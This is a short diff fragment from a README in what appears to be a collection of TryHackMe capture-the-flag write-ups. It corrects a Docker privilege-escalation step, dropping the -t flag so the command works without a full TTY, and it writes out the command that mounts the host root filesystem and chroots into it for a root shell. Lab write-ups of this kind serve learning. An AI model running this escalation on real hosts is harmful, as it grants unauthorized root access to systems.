zinzloun/THM_WriteUP/README.md

     docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt bash the input device is not a TTY
-Investigating the error, since our current shell is not a full TTY, the solution is to get rid of the t option.
-So the command to exploit it is:
+Investigating the error, since our current shell is not a full TTY, the solution is to get rid of the -t option.
+So the actual command to exploit it is:

     docker run -v /:/mnt --rm -i ubuntu:18.04 chroot /mnt bash
     <r run -v /:/mnt --rm -i ubuntu:18.04 chroot /mnt sh